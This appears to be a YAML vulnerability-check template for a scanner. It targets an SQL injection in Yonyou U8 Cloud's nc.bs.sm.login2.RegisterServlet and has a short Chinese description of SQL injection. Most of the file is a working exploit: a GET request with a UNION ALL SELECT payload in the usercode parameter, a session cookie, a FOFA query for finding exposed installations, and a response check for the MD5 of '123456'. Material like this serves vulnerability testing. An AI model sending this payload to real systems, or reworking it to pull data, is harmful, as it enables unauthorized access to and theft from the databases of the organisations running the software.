product: 用友U8-Cloud
vName: 用友U8 Cloud nc.bs.sm.login2.RegisterServlet SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: SQL注入漏洞是一种安全漏洞，它允许攻击者将恶意SQL代码插入到应用程序的输入字段中，这些输入然后被后端数据库执行。这种漏洞存在于处理输入数据时未能适当地过滤或限制SQL语句的应用程序中。攻击者利用这种漏洞可以绕过应用程序的安全机制，执行未授权的数据库命令，从而访问、窃取、修改或删除数据库中存储的敏感数据。
version: ''
note: ''
search:
  FOFA: app="用友-U8-Cloud"
protocol: http
link: https://blog.csdn.net/weixin_43167326/article/details/137066992
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /servlet/~uap/nc.bs.sm.login2.RegisterServlet?usercode=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),NULL,NULL,NULL,NULL-- Jptd
      header:
        Cookie: JSESSIONID=D523370AE42E1D2363160250C914E62A.server
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - e10adc3949ba59abbe56e057f20f883e
            logic: and